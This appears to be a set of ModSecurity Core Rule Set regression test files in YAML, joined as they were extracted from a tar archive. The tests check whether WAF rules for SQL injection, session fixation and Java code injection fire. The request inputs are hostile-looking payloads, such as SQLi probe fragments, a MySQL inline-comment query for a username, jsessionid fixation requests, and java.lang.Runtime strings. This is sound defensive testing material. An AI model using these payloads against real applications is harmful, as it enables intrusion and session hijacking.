            uri: "/"
            data: "pay=`>6fbdec2"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-9
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay='][0]]), strtolower($b[$GLOBALS['"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-10
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=', 2, 1"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-11
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "`>9e7"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-12
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=\":\"65"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-13
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay='\\2nq5"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-14
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=` < 0) AND `"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-15
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay='0:0:6"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-16
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "\":60"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  # NOTE(review): "%5 " is not a complete percent-escape; how the body
  # parser treats it is engine-specific, so this case may also raise an
  # encoding-related finding alongside the expected rule id.
  - test_title: 942490-17
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay=\">%5 - type_submit_reset_5"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-18
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "\":35"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-19
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "pay='3085'='30"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-20
    desc: "classic SQL injection probings 3/3"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
            method: POST
            port: 80
            uri: "/"
            data: "\":\"[0,\\x22"
            version: HTTP/1.0
          output:
            log_contains: id "942490"
  - test_title: 942490-21
    desc:
"classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay='16/17" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-22 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "\";}7b6" version: HTTP/1.0 output: log_contains: id "942490" ���������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml��������0000664�0000000�0000000�00000001024�14461225151�0027707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Franziska Buehler" description: None enabled: true name: 942500.yaml tests: - test_title: 942500-1 desc: "MySQL in-line comment detection" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" version: HTTP/1.0 output: log_contains: id "942500" 
# File (path taken from the archive header):
# modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml
#
# Regression cases for rule id 942510: one request that must be logged under
# that id and one that must not. Each stage describes the HTTP request
# ("input") and the expectation on the log ("output").
---
meta:
  author: "Franziska Buehler"
  # The plain scalar None is read by a YAML parser as the string "None",
  # not as null.
  description: None
  enabled: true
  name: 942510.yaml
tests:
  - test_title: 942510-1
    desc: "SQLi bypass detected: backticks"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              User-Agent: "ModSecurity CRS 3 Tests"
              Host: localhost
            method: GET
            port: 80
            # Query string holds a token wrapped in backticks.
            uri: "/?`bla`"
            version: HTTP/1.0
          output:
            # Must-match case: the log has to contain this rule id.
            log_contains: id "942510"
  - test_title: 942510-2
    desc: "SQLi bypass detected: backticks"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              User-Agent: "ModSecurity CRS 3 Tests"
              Host: localhost
            method: GET
            port: 80
            # Same token wrapped in single quotes instead of backticks.
            uri: "/?'bla'"
            version: HTTP/1.0
          output:
            # Must-not-match case: single quotes alone are not expected to
            # be logged under 942510.
            no_log_contains: id "942510"
# File (path taken from the archive header):
# modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml
#
# Regression cases for rule id 942511: one request that must not be logged
# under that id and one that must. Each stage describes the HTTP request
# ("input") and the expectation on the log ("output").
---
meta:
  author: "Walter Hop"
  # The plain scalar None is read by a YAML parser as the string "None",
  # not as null.
  description: None
  enabled: true
  name: 942511.yaml
tests:
  - test_title: 942511-1
    desc: "SQLi bypass detected: quotes"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              User-Agent: "ModSecurity CRS 3 Tests"
              Host: localhost
            method: GET
            port: 80
            # Query string holds a token wrapped in backticks.
            uri: "/?`bla`"
            version: HTTP/1.0
          output:
            # Must-not-match case: backticks alone are not expected to be
            # logged under 942511.
            no_log_contains: id "942511"
  - test_title: 942511-2
    desc: "SQLi bypass detected: quotes"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              User-Agent: "ModSecurity CRS 3 Tests"
              Host: localhost
            method: GET
            port: 80
            # Same token wrapped in single quotes.
            uri: "/?'bla'"
            version: HTTP/1.0
          output:
            # Must-match case: the log has to contain this rule id.
            log_contains: id "942511"
# File (path taken from the archive header):
# modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
#
# Single must-match regression case for rule id 943100. The stage describes
# the HTTP request ("input") and the expectation on the log ("output").
---
meta:
  author: csanders-git
  # The plain scalar None is read by a YAML parser as the string "None",
  # not as null.
  description: None
  enabled: true
  name: 943100.yaml
tests:
  - test_title: 943100-1
    desc: Session Fixation Attack (943100) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              # Multi-line plain scalar; the parser folds it into one line.
              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
                application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
              Accept-Encoding: gzip, deflate
              Accept-Language: zh-sg
              Host: localhost
              # Quoted so the header value stays a string rather than an int.
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              Referer: http
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
            method: GET
            port: 80
            # NOTE(review): as shown, the query string carries nothing
            # session-related and the Referer value is just "http"; part of
            # the request may have been lost when this page was extracted.
            # Confirm against the upstream file before relying on this case.
            uri: /foo.php?bar=blah
            version: HTTP/1.1
          output:
            log_contains: id "943100"
# File (path taken from the archive header):
# modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
#
# Regression cases for rule id 943110. Cases 1-3 combine a session-id query
# parameter with a Referer on another host and must be logged; case 4 sends
# the same parameter with a Referer on the request's own host and must not.
---
meta:
  author: csanders-git
  # The plain scalar None is read by a YAML parser as the string "None",
  # not as null.
  description: None
  enabled: true
  name: 943110.yaml
tests:
  - test_title: 943110-1
    desc: Session Fixation Attack (943110) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              # Multi-line plain scalar; the parser folds it into one line.
              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
                application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
              Accept-Encoding: gzip, deflate
              Accept-Language: zh-sg
              Content-Type: application/x-www-form-urlencoded
              Host: localhost
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              # Referer host differs from the Host header.
              Referer: http://www.attackersite.com/test
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
            method: GET
            port: 80
            uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
            version: HTTP/1.1
          output:
            log_contains: id "943110"
  - test_title: 943110-2
    desc: "session fixation attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
              # The Referer host starts with the Host value ("localhost") but
              # belongs to another domain; the case expects it to be logged
              # all the same, so a prefix comparison would not be enough.
              Referer: "https://localhost.attackersite.com/"
            method: GET
            port: 80
            uri: "/?phpsessid=asdfdasfadsads"
            version: HTTP/1.0
          output:
            log_contains: id "943110"
  - test_title: 943110-3
    desc: "session fixation attack"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Host: localhost
              Referer: "https://attackersite.com/"
            method: GET
            port: 80
            uri: "/?phpsessid=asdfdasfadsads"
            version: HTTP/1.0
          output:
            log_contains: id "943110"
  - test_title: 943110-4
    desc: Session Fixation Attack (943110) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel
              Accept-Encoding: gzip, deflate
              Accept-Language: zh-sg
              Content-Type: application/x-www-form-urlencoded
              Host: localhost
              # Referer host equals the Host header.
              Referer: http://localhost/test
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
            method: GET
            port: 80
            uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
            version: HTTP/1.1
          output:
            # Must-not-match case: guards against flagging same-host links
            # that carry a session id.
            no_log_contains: id "943110"

# File (path taken from the archive header):
# modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
#
# Single must-match regression case for rule id 943120; the file has no
# no_log_contains counterpart.
---
meta:
  author: csanders-git
  description: None
  enabled: true
  name: 943120.yaml
tests:
  - test_title: 943120-1
    desc: Session Fixation Attack (943120) from old modsec regressions
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            # No Referer header is sent in this request.
            headers:
              Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
                application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
              Accept-Encoding: gzip, deflate
              Accept-Language: zh-sg
              Host: localhost
              Keep-Alive: '300'
              Proxy-Connection: keep-alive
              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
            method: GET
            port: 80
            uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
            version: HTTP/1.1
          output:
            log_contains: id "943120"

# File (path taken from the archive header):
# modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
#
# Single must-not-match case for id 944000: a POST with a text/plain body
# must not leave that id in the log.
---
meta:
  author: "spartantri"
  enabled: true
  name: "944000.yaml"
  description: "Description"
tests:
  - test_title: 944000-1
    desc: Using text/plain Content-Type which do not have any bodyprocessor associated
    stages:
      - stage:
          input:
            dest_addr: "127.0.0.1"
            port: 80
            headers:
              Host: "localhost"
              User-Agent: "ModSecurity CRS 3 Tests"
              Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
              Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
              Accept-Encoding: gzip,deflate
              Accept-Language: en-us,en;q=0.5
              Content-Type: "text/plain"
            method: POST
            version: HTTP/1.0
            data: "test=value"
          output:
            # Double-quoted form of the same pattern the other files write
            # as a plain scalar: id "944000".
            no_log_contains: "id \"944000\""
�����������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml��������0000664�0000000�0000000�00000035120�14461225151�0027664�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944100.yaml" description: "Description" tests: - test_title: 944100-1 desc: Argument test includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/x-www-form-urlencoded" method: POST version: HTTP/1.0 data: "test=java.lang.Runtime" output: log_contains: "id \"944100\"" - test_title: 944100-2 desc: Argument test includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "test=java.lang.ProcessBuilder" output: log_contains: "id \"944100\"" - test_title: 944100-3 desc: Argument name includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" 
port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.lang.Runtime=test" output: log_contains: "id \"944100\"" - test_title: 944100-4 desc: Argument name includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.lang.ProcessBuilder=test" output: log_contains: "id \"944100\"" - test_title: 944100-5 desc: Cookie test includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.lang.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-6 desc: Cookie test includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: 
test=java.lang.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-7 desc: Cookie name includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.lang.Runtime=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-8 desc: Cookie name includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.lang.ProcessBuilder=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-9 desc: Request header test includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.lang.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-10 desc: Request header test includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" 
User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.lang.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944100\"" - test_title: 944100-11 desc: XML element includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944100\"" - test_title: 944100-12 desc: XML attribute name includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944100\"" - test_title: 944100-13 desc: XML attribute value includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" 
output: log_contains: "id \"944100\"" - test_title: 944100-14 desc: XML element value includes keywords java.lang.Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.lang.Runtime" output: log_contains: "id \"944100\"" - test_title: 944100-15 desc: XML element includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "value" output: no_log_contains: "id \"944100\"" - test_title: 944100-16 desc: XML attribute name includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: no_log_contains: "id \"944100\"" - test_title: 944100-17 desc: XML attribute value includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "element_value" output: log_contains: "id \"944100\"" - test_title: 944100-18 desc: XML element value includes keywords java.lang.ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/xml" method: POST version: HTTP/1.0 data: "java.lang.ProcessBuilder" output: log_contains: "id \"944100\"" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml��������0000664�0000000�0000000�00000035054�14461225151�0027673�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "spartantri" enabled: true name: "944110.yaml" description: "Description" tests: - test_title: 944110-1 desc: Argument test includes keywords 
java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "application/x-www-form-urlencoded" method: POST version: HTTP/1.0 data: "test=java.Runtime" output: log_contains: "id \"944110\"" - test_title: 944110-2 desc: Argument test includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "test=java.ProcessBuilder" output: log_contains: "id \"944110\"" - test_title: 944110-3 desc: Argument name includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.Runtime=test" output: log_contains: "id \"944110\"" - test_title: 944110-4 desc: Argument name includes keywords java. 
and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" method: POST version: HTTP/1.0 data: "java.ProcessBuilder=test" output: log_contains: "id \"944110\"" - test_title: 944110-5 desc: Cookie test includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-6 desc: Cookie test includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: test=java.ProcessBuilder method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-7 desc: Cookie name includes keywords java. 
and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.Runtime=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-8 desc: Cookie name includes keywords java. and ProcessBuilder stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" Cookie: java.ProcessBuilder=test method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-9 desc: Request header test includes keywords java. and Runtime stages: - stage: input: dest_addr: "127.0.0.1" port: 80 headers: Host: "localhost" User-Agent: "ModSecurity CRS 3 Tests" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Accept-Encoding: gzip,deflate Accept-Language: en-us,en;q=0.5 Content-Type: "text/plain" test: java.Runtime method: POST version: HTTP/1.0 data: "test=value" output: log_contains: "id \"944110\"" - test_title: 944110-10 desc: Request header test includes keywords java. 
